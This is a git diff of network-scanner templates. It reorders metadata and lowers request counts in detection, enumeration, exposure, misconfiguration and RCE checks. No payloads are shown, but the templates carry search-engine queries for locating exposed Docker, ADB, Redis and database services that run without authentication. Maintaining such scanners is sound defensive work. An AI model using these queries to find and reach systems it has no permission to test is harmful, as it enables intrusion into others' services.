CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cwe-id: CWE-200 metadata: - max-request: 2 + max-request: 1 + tags: network,mongodb,detect tcp: - inputs: diff --git a/network/detection/msmq-detect.yaml b/network/detection/msmq-detect.yaml index c5f820607d..0429cdbb09 100644 --- a/network/detection/msmq-detect.yaml +++ b/network/detection/msmq-detect.yaml @@ -11,10 +11,10 @@ info: - https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-mqqb/50da7ea1-eed7-41f9-ba6a-2aa37f5f1e92 - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-21554 metadata: - max-request: 2 - verified: true - shodan-query: MSMQ censys-query: services.service_name:MSMQ + max-request: 1 + shodan-query: MSMQ + verified: true tags: network,msmq,detect tcp: diff --git a/network/detection/mysql-detect.yaml b/network/detection/mysql-detect.yaml index f7e5ee3c42..8319e00b54 100644 --- a/network/detection/mysql-detect.yaml +++ b/network/detection/mysql-detect.yaml @@ -8,12 +8,11 @@ info: MySQL instance was detected. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 cwe-id: CWE-200 metadata: - max-request: 2 - verified: true + max-request: 1 shodan-query: product:"MySQL" + verified: true tags: network,mysql,db,detect tcp: diff --git a/network/detection/openssh-detect.yaml b/network/detection/openssh-detect.yaml index b2247e0ca9..4d71cedb67 100644 --- a/network/detection/openssh-detect.yaml +++ b/network/detection/openssh-detect.yaml @@ -6,19 +6,18 @@ info: severity: info description: | OpenSSH service was detected. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cwe-id: CWE-200 reference: - http://www.openwall.com/lists/oss-security/2016/08/01/2 - http://www.openwall.com/lists/oss-security/2018/08/15/5 - http://seclists.org/fulldisclosure/2016/Jul/51 - https://nvd.nist.gov/vuln/detail/CVE-2016-6210 - https://nvd.nist.gov/vuln/detail/CVE-2018-15473 - tags: seclists,network,ssh,openssh,detect + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cwe-id: CWE-200 metadata: - max-request: 2 + max-request: 1 + tags: seclists,network,ssh,openssh,detect tcp: - host: diff --git a/network/detection/pgsql-detect.yaml b/network/detection/pgsql-detect.yaml index aa2eac58ee..91f8054806 100644 --- a/network/detection/pgsql-detect.yaml +++ b/network/detection/pgsql-detect.yaml @@ -11,12 +11,11 @@ info: - https://www.postgresql.org/docs/current/client-authentication-problems.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 cwe-id: CWE-200 metadata: - max-request: 2 - verified: true + max-request: 1 shodan-query: port:5432 product:"PostgreSQL" + verified: true tags: network,postgresql,db,detect tcp: diff --git a/network/detection/pop3-detect.yaml b/network/detection/pop3-detect.yaml index e0188625a5..fc6a17a996 100644 --- a/network/detection/pop3-detect.yaml +++ b/network/detection/pop3-detect.yaml @@ -10,12 +10,11 @@ info: - https://nmap.org/nsedoc/scripts/pop3-ntlm-info.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 cwe-id: CWE-200 metadata: - max-request: 2 + max-request: 1 + shodan-query: pop3 port:110 verified: true - shodan-query: 'pop3 port:110' tags: network,detect,pop3,mail tcp: diff --git a/network/detection/proftpd-server-detect.yaml b/network/detection/proftpd-server-detect.yaml index f00fcb785d..d916b8d423 100644 --- a/network/detection/proftpd-server-detect.yaml +++ b/network/detection/proftpd-server-detect.yaml @@ -7,9 +7,9 @@ info: description: | The File Transfer Protocol (FTP) is a standard network protocol used to transfer computer files between a client and server on a computer network. metadata: - max-request: 2 + max-request: 1 + shodan-query: product:"ProFTPD" verified: true - shodan-query: 'product:"ProFTPD"' tags: network,ftp,proftpd,detect tcp: diff --git a/network/detection/rabbitmq-detect.yaml b/network/detection/rabbitmq-detect.yaml index d30db181a7..5b8f10167c 100644 --- a/network/detection/rabbitmq-detect.yaml +++ b/network/detection/rabbitmq-detect.yaml @@ -9,9 +9,9 @@ info: reference: - https://nmap.org/nsedoc/scripts/amqp-info.html metadata: - max-request: 2 - verified: true + max-request: 1 shodan-query: product:"RabbitMQ" + verified: true tags: network,rabbitmq,oss,detect tcp: diff --git a/network/detection/rdp-detect.yaml b/network/detection/rdp-detect.yaml index 0d76f3cf69..635ac81a3a 100644 --- a/network/detection/rdp-detect.yaml +++ b/network/detection/rdp-detect.yaml @@ -8,10 +8,9 @@ info: Windows Remote Desktop Protocol was detected. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 cwe-id: CWE-200 metadata: - max-request: 2 + max-request: 1 verified: true tags: network,windows,rdp,detect diff --git a/network/detection/redis-detect.yaml b/network/detection/redis-detect.yaml index a10cd201cf..4a70dfdd40 100644 --- a/network/detection/redis-detect.yaml +++ b/network/detection/redis-detect.yaml @@ -9,7 +9,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - max-request: 4 + max-request: 1 shodan-query: product:"redis" verified: true tags: network,redis,detect diff --git a/network/detection/riak-detect.yaml b/network/detection/riak-detect.yaml index e065574dab..bc0315d527 100644 --- a/network/detection/riak-detect.yaml +++ b/network/detection/riak-detect.yaml @@ -6,9 +6,9 @@ info: severity: info description: Riak is a distributed NoSQL key-value data store that offers high availability, fault tolerance, operational simplicity, and scalability. metadata: - max-request: 2 - verified: true + max-request: 1 shodan-query: product:"Riak" + verified: true tags: network,oss,detect tcp: diff --git a/network/detection/rpcbind-portmapper-detect.yaml b/network/detection/rpcbind-portmapper-detect.yaml index c5e1a28a2a..02e9ef6520 100644 --- a/network/detection/rpcbind-portmapper-detect.yaml +++ b/network/detection/rpcbind-portmapper-detect.yaml @@ -8,12 +8,11 @@ info: reference: https://book.hacktricks.xyz/pentesting/pentesting-rpcbind classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 cwe-id: CWE-200 metadata: - max-request: 2 - verified: true + max-request: 1 shodan-query: port:"111" + verified: true tags: network,rpcbind,portmap,detect tcp: diff --git a/network/detection/rsyncd-service-detect.yaml b/network/detection/rsyncd-service-detect.yaml index fb9513e98a..121d709d18 100644 --- a/network/detection/rsyncd-service-detect.yaml +++ b/network/detection/rsyncd-service-detect.yaml @@ -10,11 +10,10 @@ info: - https://linux.die.net/man/1/rsync classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 cwe-id: CWE-200 - tags: network,rsyncd,detect metadata: - max-request: 2 + max-request: 1 + tags: network,rsyncd,detect tcp: - inputs: diff --git a/network/detection/rtsp-detect.yaml b/network/detection/rtsp-detect.yaml index 43914dcbfe..1aa38c37f7 100644 --- a/network/detection/rtsp-detect.yaml +++ b/network/detection/rtsp-detect.yaml @@ -10,12 +10,11 @@ info: https://nmap.org/nsedoc/scripts/rtsp-methods.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 cwe-id: CWE-200 metadata: - max-request: 2 - verified: true + max-request: 1 shodan-query: RTSP/1.0 + verified: true tags: network,rtsp,detect tcp: diff --git a/network/detection/samba-detect.yaml b/network/detection/samba-detect.yaml index 7af60e0236..5c2f94fa7b 100644 --- a/network/detection/samba-detect.yaml +++ b/network/detection/samba-detect.yaml @@ -8,12 +8,12 @@ info: reference: - https://www.samba.org/samba/what_is_samba.html - https://www.samba.org/samba/history/security.html + remediation: Always apply the latest security patch. classification: cwe-id: CWE-200 - remediation: Always apply the latest security patch. - tags: network,smb,samba,detect metadata: - max-request: 2 + max-request: 1 + tags: network,smb,samba,detect tcp: - inputs: diff --git a/network/detection/sap-router.yaml b/network/detection/sap-router.yaml index 63aa87a552..482076acb8 100644 --- a/network/detection/sap-router.yaml +++ b/network/detection/sap-router.yaml @@ -4,11 +4,11 @@ info: name: SAPRouter Detection author: randomstr1ng severity: info - tags: network,sap,detect description: | SAProuter is a software application that provides a remote connection between our customer's network and SAP. metadata: - max-request: 2 + max-request: 1 + tags: network,sap,detect tcp: - inputs: diff --git a/network/detection/smb-detect.yaml b/network/detection/smb-detect.yaml index 3d9c2982a6..136bcb5dd2 100644 --- a/network/detection/smb-detect.yaml +++ b/network/detection/smb-detect.yaml @@ -4,11 +4,11 @@ info: name: SMB Detection author: pussycat0x severity: low - tags: network,windows,smb,service,detect description: | SMB (Server Message Block) is a network-layered protocol mainly used on Windows for sharing files, printers, and communication between network-attached computers. SMB related vulnerabilities can be levaraged to compromise large-scale systems. metadata: - max-request: 2 + max-request: 1 + tags: network,windows,smb,service,detect tcp: - inputs: diff --git a/network/detection/smtp-detect.yaml b/network/detection/smtp-detect.yaml index 5e263cb783..c1f47429d5 100644 --- a/network/detection/smtp-detect.yaml +++ b/network/detection/smtp-detect.yaml @@ -4,11 +4,11 @@ info: name: SMTP Service Detection author: pussycat0x severity: info - tags: network,service,smtp,detect description: | SMTP is part of the application layer of the TCP/IP protocol. Using a process called “store and forward,” SMTP moves your email on and across networks. metadata: - max-request: 2 + max-request: 1 + tags: network,service,smtp,detect tcp: - inputs: diff --git a/network/detection/sshd-dropbear-detect.yaml b/network/detection/sshd-dropbear-detect.yaml index d99362fa58..fbe7736c56 100644 --- a/network/detection/sshd-dropbear-detect.yaml +++ b/network/detection/sshd-dropbear-detect.yaml @@ -7,9 +7,9 @@ info: description: | Dropbear is a software package written by Matt Johnston that provides a Secure Shell-compatible server and client. It is designed as a replacement for standard OpenSSH for environments with low memory and processor resources, such as embedded systems metadata: - max-request: 2 + max-request: 1 + shodan-query: product:"Dropbear sshd" verified: true - shodan-query: 'product:"Dropbear sshd"' tags: network,ssh,dropbear,detect tcp: diff --git a/network/detection/starttls-mail-detect.yaml b/network/detection/starttls-mail-detect.yaml index 93df953557..2795600fde 100644 --- a/network/detection/starttls-mail-detect.yaml +++ b/network/detection/starttls-mail-detect.yaml @@ -4,11 +4,11 @@ info: name: STARTTLS Mail Server Detection author: r3dg33k severity: info - tags: mail,starttls,network,detect description: | STARTTLS is an email protocol command that tells an email server that an email client, including an email client running in a web browser, wants to turn an existing insecure connection into a secure one. metadata: - max-request: 2 + max-request: 1 + tags: mail,starttls,network,detect tcp: - inputs: diff --git a/network/detection/teamspeak3-detect.yaml b/network/detection/teamspeak3-detect.yaml index b09be70bd9..57cfddee64 100644 --- a/network/detection/teamspeak3-detect.yaml +++ b/network/detection/teamspeak3-detect.yaml @@ -1,16 +1,16 @@ id: teamspeak3-detect -info: - name: TeamSpeak 3 ServerQuery Detection - author: pussycat0x - severity: info - description: | - ServerQuery is a commandline based administration tool/feature of TeamSpeak 3 server. - metadata: - max-request: 2 - shodan-query: product:"TeamSpeak 3 ServerQuery" - verified: true - tags: network,service,teamspeak3,detect +info: + name: TeamSpeak 3 ServerQuery Detection + author: pussycat0x + severity: info + description: | + ServerQuery is a commandline based administration tool/feature of TeamSpeak 3 server. + metadata: + max-request: 1 + shodan-query: product:"TeamSpeak 3 ServerQuery" + verified: true + tags: network,service,teamspeak3,detect tcp: - inputs: - data: "\r\n" diff --git a/network/detection/telnet-detect.yaml b/network/detection/telnet-detect.yaml index e68df9520c..7682c01f76 100644 --- a/network/detection/telnet-detect.yaml +++ b/network/detection/telnet-detect.yaml @@ -7,9 +7,9 @@ info: description: | Telnet is a network protocol used to virtually access a computer and to provide a two-way, collaborative and text-based communication channel between two machines. metadata: - max-request: 2 - verified: true + max-request: 1 shodan-query: port:23 telnet + verified: true tags: network,telnet,detect tcp: diff --git a/network/detection/totemomail-smtp-detect.yaml b/network/detection/totemomail-smtp-detect.yaml index f2d966de42..25c4ec402b 100644 --- a/network/detection/totemomail-smtp-detect.yaml +++ b/network/detection/totemomail-smtp-detect.yaml @@ -4,11 +4,11 @@ info: name: Totemomail SMTP Server Detection author: princechaddha severity: info - tags: mail,smtp,network,totemomail,detect description: | Totemomail is a comprehensive email solution designed to address all aspects of digital communication security. metadata: - max-request: 2 + max-request: 1 + tags: mail,smtp,network,totemomail,detect tcp: - inputs: diff --git a/network/detection/vmware-authentication-daemon-detect.yaml b/network/detection/vmware-authentication-daemon-detect.yaml index e40312fe68..09a4f326e6 100644 --- a/network/detection/vmware-authentication-daemon-detect.yaml +++ b/network/detection/vmware-authentication-daemon-detect.yaml @@ -7,9 +7,9 @@ info: description: | vmauthd is the VMWare authentication daemon that is included with many VMWare products, including ESX(i), and Workstation. metadata: - max-request: 2 + max-request: 1 + shodan-query: product:"VMware Authentication Daemon" verified: true - shodan-query: 'product:"VMware Authentication Daemon"' tags: network,vmware,authenticated,detect tcp: diff --git a/network/detection/vnc-service-detect.yaml b/network/detection/vnc-service-detect.yaml index b92a47d673..5f765590ab 100644 --- a/network/detection/vnc-service-detect.yaml +++ b/network/detection/vnc-service-detect.yaml @@ -7,9 +7,9 @@ info: description: A Virtual Network Computing (VNC) service was detected. classification: cwe-id: CWE-200 - tags: network,vnc,service,detect metadata: - max-request: 2 + max-request: 1 + tags: network,vnc,service,detect tcp: - inputs: diff --git a/network/detection/xlight-ftp-service-detect.yaml b/network/detection/xlight-ftp-service-detect.yaml index ffcb30c9f4..d1d3c60b8b 100644 --- a/network/detection/xlight-ftp-service-detect.yaml +++ b/network/detection/xlight-ftp-service-detect.yaml @@ -7,9 +7,9 @@ info: description: | The File Transfer Protocol (FTP) is a standard network protocol used to transfer computer files between a client and server on a computer network. metadata: - max-request: 2 + max-request: 1 + shodan-query: product:"Xlight ftpd" verified: true - shodan-query: 'product:"Xlight ftpd"' tags: network,ftp,xlight,detect tcp: diff --git a/network/enumeration/mongodb-info-enum.yaml b/network/enumeration/mongodb-info-enum.yaml index 6f070dcde2..df5432c84b 100644 --- a/network/enumeration/mongodb-info-enum.yaml +++ b/network/enumeration/mongodb-info-enum.yaml @@ -10,12 +10,11 @@ info: - https://nmap.org/nsedoc/scripts/mongodb-info.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 cwe-id: CWE-200 metadata: - max-request: 2 - verified: true + max-request: 1 shodan-query: mongodb server information + verified: true tags: network,mongodb,enum tcp: diff --git a/network/enumeration/niagara-fox-info-enum.yaml b/network/enumeration/niagara-fox-info-enum.yaml index 80eb85050b..1d8d3d7d36 100644 --- a/network/enumeration/niagara-fox-info-enum.yaml +++ b/network/enumeration/niagara-fox-info-enum.yaml @@ -6,12 +6,12 @@ info: severity: info description: | Niagara Fox Protocol is a building automation protocol used between the Niagara software systems by Tridium. - metadata: - max-request: 2 - verified: true - shodan-query: 'product:"Niagara Fox"' reference: - https://nmap.org/nsedoc/scripts/fox-info.html + metadata: + max-request: 1 + shodan-query: product:"Niagara Fox" + verified: true tags: network,fox,niagara,enum tcp: diff --git a/network/enumeration/psql-user-enum.yaml b/network/enumeration/psql-user-enum.yaml index eb224be71e..5416a20e19 100644 --- a/network/enumeration/psql-user-enum.yaml +++ b/network/enumeration/psql-user-enum.yaml @@ -9,7 +9,7 @@ info: reference: - https://medium.com/@netscylla/pentesters-guide-to-postgresql-hacking-59895f4f007 metadata: - max-request: 2 + max-request: 1 shodan-query: port:5432 product:"PostgreSQL" verified: "true" tags: network,postgresql,db,unauth,enum,psql diff --git a/network/enumeration/smtp-commands-enum.yaml b/network/enumeration/smtp-commands-enum.yaml index 10729964ed..23ae8283cb 100644 --- a/network/enumeration/smtp-commands-enum.yaml +++ b/network/enumeration/smtp-commands-enum.yaml @@ -9,9 +9,9 @@ info: reference: - https://nmap.org/nsedoc/scripts/smtp-commands.html metadata: - max-request: 2 + max-request: 1 + shodan-query: smtp verified: true - shodan-query: 'smtp' tags: network,enum,smtp,mail tcp: diff --git a/network/enumeration/smtp/smtp-user-enum.yaml b/network/enumeration/smtp/smtp-user-enum.yaml index 6749a789c3..8755237141 100644 --- a/network/enumeration/smtp/smtp-user-enum.yaml +++ b/network/enumeration/smtp/smtp-user-enum.yaml @@ -9,7 +9,7 @@ info: reference: - https://nmap.org/nsedoc/scripts/smtp-enum-users.html metadata: - max-request: 2 + max-request: 1 shodan-query: smtp verified: true tags: network,enum,smtp,mail diff --git a/network/exposures/cisco-smi-exposure.yaml b/network/exposures/cisco-smi-exposure.yaml index 2ac4e72017..e2f9022426 100644 --- a/network/exposures/cisco-smi-exposure.yaml +++ b/network/exposures/cisco-smi-exposure.yaml @@ -15,9 +15,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-200 - tags: network,cisco,smi,exposure metadata: - max-request: 2 + max-request: 1 + tags: network,cisco,smi,exposure tcp: - inputs: diff --git a/network/exposures/exposed-adb.yaml b/network/exposures/exposed-adb.yaml index 4a678cc68c..6c725238d4 100644 --- a/network/exposures/exposed-adb.yaml +++ b/network/exposures/exposed-adb.yaml @@ -9,9 +9,9 @@ info: - https://doublepulsar.com/root-bridge-how-thousands-of-internet-connected-android-devices-now-have-no-security-and-are-b46a68cb0f20 - https://www.hackeracademy.org/how-to-hack-android-device-with-adb-android-debugging-bridge - https://www.securezoo.com/2018/06/thousands-of-android-devices-leave-debug-port-5555-exposed/ - tags: network,adb,rce,android,exposure metadata: - max-request: 2 + max-request: 1 + tags: network,adb,rce,android,exposure tcp: - inputs: diff --git a/network/exposures/exposed-dockerd.yaml b/network/exposures/exposed-dockerd.yaml index 9fa8a541e3..f5ad4518d5 100644 --- a/network/exposures/exposed-dockerd.yaml +++ b/network/exposures/exposed-dockerd.yaml @@ -7,9 +7,9 @@ info: description: | Docker Daemon exposed on the network map can help remote attacker to gain access to the Docker containers and potentially the host system. metadata: - max-request: 2 - verified: true + max-request: 1 shodan-query: port:2375 product:"docker" + verified: true tags: network,docker,exposure tcp: diff --git a/network/exposures/exposed-redis.yaml b/network/exposures/exposed-redis.yaml index 5abd6d2c3d..b650a33d0d 100644 --- a/network/exposures/exposed-redis.yaml +++ b/network/exposures/exposed-redis.yaml @@ -12,7 +12,7 @@ info: cvss-score: 7.2 cwe-id: CWE-306 metadata: - max-request: 4 + max-request: 1 tags: network,redis,unauth,exposure tcp: diff --git a/network/exposures/exposed-zookeeper.yaml b/network/exposures/exposed-zookeeper.yaml index 87d6712ba7..c3a87b47aa 100644 --- a/network/exposures/exposed-zookeeper.yaml +++ b/network/exposures/exposed-zookeeper.yaml @@ -7,9 +7,9 @@ info: description: Apache ZooKeeper was able to be accessed without any required authentication. reference: - https://zookeeper.apache.org/security.html - tags: network,zookeeper,unauth,exposure metadata: - max-request: 2 + max-request: 1 + tags: network,zookeeper,unauth,exposure tcp: - inputs: diff --git a/network/misconfig/apache-dubbo-unauth.yaml b/network/misconfig/apache-dubbo-unauth.yaml index 0ed64221ab..9e0ef74302 100644 --- a/network/misconfig/apache-dubbo-unauth.yaml +++ b/network/misconfig/apache-dubbo-unauth.yaml @@ -10,7 +10,7 @@ info: - https://dubbo.apache.org/en/docs3-v2/java-sdk/advanced-features-and-usage/security/auth/ metadata: fofa-query: apache dubbo - max-request: 2 + max-request: 1 verified: true tags: network,dubbo,apache,unauth,misconfig diff --git a/network/misconfig/apache-rocketmq-broker-unauth.yaml b/network/misconfig/apache-rocketmq-broker-unauth.yaml index eae52acaca..10c1854114 100644 --- a/network/misconfig/apache-rocketmq-broker-unauth.yaml +++ b/network/misconfig/apache-rocketmq-broker-unauth.yaml @@ -10,7 +10,7 @@ info: - https://rocketmq.apache.org/docs/bestPractice/03access metadata: fofa-query: protocol="rocketmq" - max-request: 2 + max-request: 1 shodan-query: title:"RocketMQ" verified: true tags: network,rocketmq,broker,apache,unauth,misconfig diff --git a/network/misconfig/clamav-unauth.yaml b/network/misconfig/clamav-unauth.yaml index 8b5ccff311..bcdd433853 100644 --- a/network/misconfig/clamav-unauth.yaml +++ b/network/misconfig/clamav-unauth.yaml @@ -8,13 +8,13 @@ info: ClamAV server 0.99.2, and possibly other previous versions, allow the execution of dangerous service commands without authentication. Specifically, the command 'SCAN' may be used to list system files and the command 'SHUTDOWN' shut downs the service. - metadata: - max-request: 2 - verified: true - shodan-query: 'port:3310 product:"ClamAV" version:"0.99.2"' reference: - https://seclists.org/nmap-dev/2016/q2/201 - https://bugzilla.clamav.net/show_bug.cgi?id=11585 + metadata: + max-request: 1 + shodan-query: port:3310 product:"ClamAV" version:"0.99.2" + verified: true tags: network,clamav,unauth,seclists,misconfig tcp: diff --git a/network/misconfig/clickhouse-unauth.yaml b/network/misconfig/clickhouse-unauth.yaml index 3bd27b9528..99acb401f2 100644 --- a/network/misconfig/clickhouse-unauth.yaml +++ b/network/misconfig/clickhouse-unauth.yaml @@ -5,9 +5,9 @@ info: author: lu4nx severity: high description: ClickHouse was able to be accessed with no required authentication in place. - tags: network,clickhouse,unauth,misconfig metadata: - max-request: 2 + max-request: 1 + tags: network,clickhouse,unauth,misconfig tcp: - inputs: diff --git a/network/misconfig/dropbear-weakalgo.yaml b/network/misconfig/dropbear-weakalgo.yaml index f597277415..f6a4a5d82a 100644 --- a/network/misconfig/dropbear-weakalgo.yaml +++ b/network/misconfig/dropbear-weakalgo.yaml @@ -6,14 +6,14 @@ info: severity: low description: | The SSH key exchange algorithm is fundamental to keep the protocol secure. It is what allows two previously unknown parties to generate a shared key in plain sight, and have that secret remain private to the client and server. Over time, some implementations of this algorithm have been identified as weak or vulnerable. - remediation: | - Disable the weak algorithms. reference: | https://www.virtuesecurity.com/kb/ssh-weak-key-exchange-algorithms-enabled + remediation: | + Disable the weak algorithms. metadata: - max-request: 2 + max-request: 1 + shodan-query: product:"Dropbear sshd" verified: true - shodan-query: 'product:"Dropbear sshd"' tags: network,ssh,dropbear,misconfig tcp: diff --git a/network/misconfig/dropbear-weakmac.yaml b/network/misconfig/dropbear-weakmac.yaml index 0fd36cf4fd..7e69936ac9 100644 --- a/network/misconfig/dropbear-weakmac.yaml +++ b/network/misconfig/dropbear-weakmac.yaml @@ -6,14 +6,14 @@ info: severity: low description: | The mac-alg command specifies which MAC algorithms in the SSH client profile for SSH encryption negotiation with an SFTP server when the DataPower Gateway acts as an SFTP client. - remediation: | - Disable MD5 and 96-bit MAC algorithms. reference: | https://www.virtuesecurity.com/kb/ssh-weak-mac-algorithms-enabled + remediation: | + Disable MD5 and 96-bit MAC algorithms. metadata: - max-request: 2 + max-request: 1 + shodan-query: product:"Dropbear sshd" verified: true - shodan-query: 'product:"Dropbear sshd"' tags: network,ssh,dropbear,misconfig tcp: diff --git a/network/misconfig/ganglia-xml-grid-monitor.yaml b/network/misconfig/ganglia-xml-grid-monitor.yaml index a7816a7dbd..db7c96a7fd 100644 --- a/network/misconfig/ganglia-xml-grid-monitor.yaml +++ b/network/misconfig/ganglia-xml-grid-monitor.yaml @@ -7,9 +7,9 @@ info: description: Ganglia is a scalable distributed monitoring system for high-performance computing systems such as clusters and Grids. reference: - http://ganglia.info/ - tags: ganglia,network,misconfig metadata: - max-request: 2 + max-request: 1 + tags: ganglia,network,misconfig tcp: - inputs: diff --git a/network/misconfig/memcached-stats.yaml b/network/misconfig/memcached-stats.yaml index 3d7935ea93..b7f07c666a 100644 --- a/network/misconfig/memcached-stats.yaml +++ b/network/misconfig/memcached-stats.yaml @@ -4,11 +4,11 @@ info: name: Memcached stats disclosure author: pdteam severity: low - tags: network,memcached,misconfig description: | Memcached stats is used to return server statistics such as PID, version, connections, etc. metadata: - max-request: 2 + max-request: 1 + tags: network,memcached,misconfig tcp: - inputs: diff --git a/network/misconfig/mongodb-unauth.yaml b/network/misconfig/mongodb-unauth.yaml index 1a68ce191f..4bd358db9f 100644 --- a/network/misconfig/mongodb-unauth.yaml +++ b/network/misconfig/mongodb-unauth.yaml @@ -10,9 +10,9 @@ info: - https://book.hacktricks.xyz/pentesting/27017-27018-mongodb - https://www.mongodb.com/features/mongodb-authentication remediation: Enable Authentication in MongoDB - tags: network,mongodb,unauth,misconfig metadata: - max-request: 2 + max-request: 1 + tags: network,mongodb,unauth,misconfig tcp: - inputs: diff --git a/network/misconfig/mysql-native-password.yaml b/network/misconfig/mysql-native-password.yaml index 83386d529c..c4f682871a 100644 --- a/network/misconfig/mysql-native-password.yaml +++ b/network/misconfig/mysql-native-password.yaml @@ -9,11 +9,10 @@ info: - https://github.com/Tinram/MySQL-Brute classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 cwe-id: CWE-200 - tags: network,mysql,bruteforce,db,misconfig metadata: - max-request: 2 + max-request: 1 + tags: network,mysql,bruteforce,db,misconfig tcp: - host: diff --git a/network/misconfig/sap-router-info-leak.yaml b/network/misconfig/sap-router-info-leak.yaml index ee872add7f..ab28f3c96d 100644 --- a/network/misconfig/sap-router-info-leak.yaml +++ b/network/misconfig/sap-router-info-leak.yaml @@ -8,9 +8,9 @@ info: reference: - https://securityforeveryone.com/tools/saprouter-routing-information-leakage-vulnerability-scanner - https://support.sap.com/en/tools/connectivity-tools/saprouter.html - tags: network,sap,misconfig metadata: - max-request: 2 + max-request: 1 + tags: network,sap,misconfig tcp: - inputs: diff --git a/network/misconfig/tidb-native-password.yaml b/network/misconfig/tidb-native-password.yaml index d131d74ee7..aeb6e69353 100644 --- a/network/misconfig/tidb-native-password.yaml +++ b/network/misconfig/tidb-native-password.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cwe-id: CWE-200 - tags: network,tidb,bruteforce,db,misconfig metadata: - max-request: 2 + max-request: 1 + tags: network,tidb,bruteforce,db,misconfig tcp: - host: diff --git a/network/misconfig/tidb-unauth.yaml b/network/misconfig/tidb-unauth.yaml index 943586a9ad..d6d2a94c99 100644 --- a/network/misconfig/tidb-unauth.yaml +++ b/network/misconfig/tidb-unauth.yaml @@ -6,7 +6,7 @@ info: severity: high description: TiDB server was able to be accessed because no authentication was required. metadata: - max-request: 2 + max-request: 1 zoomeye-query: tidb +port:"4000" tags: network,tidb,unauth,misconfig diff --git a/network/misconfig/unauth-psql.yaml b/network/misconfig/unauth-psql.yaml index 105301b3a5..66d07bcd01 100644 --- a/network/misconfig/unauth-psql.yaml +++ b/network/misconfig/unauth-psql.yaml @@ -9,7 +9,7 @@ info: reference: - https://www.postgresql.org/docs/9.6/auth-methods.html metadata: - max-request: 2 + max-request: 1 shodan-query: port:5432 product:"PostgreSQL" verified: "true" tags: network,postgresql,db,unauth,misconfig diff --git a/network/vulnerabilities/clockwatch-enterprise-rce.yaml b/network/vulnerabilities/clockwatch-enterprise-rce.yaml index b42c2cc72b..633168c204 100644 --- a/network/vulnerabilities/clockwatch-enterprise-rce.yaml +++ b/network/vulnerabilities/clockwatch-enterprise-rce.yaml @@ -10,11 +10,11 @@ info: - https://blog.grimm-co.com/2021/07/old-dog-same-tricks.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-77 - tags: clockwatch,rce,network metadata: - max-request: 2 + max-request: 1 + tags: clockwatch,rce,network tcp: - inputs: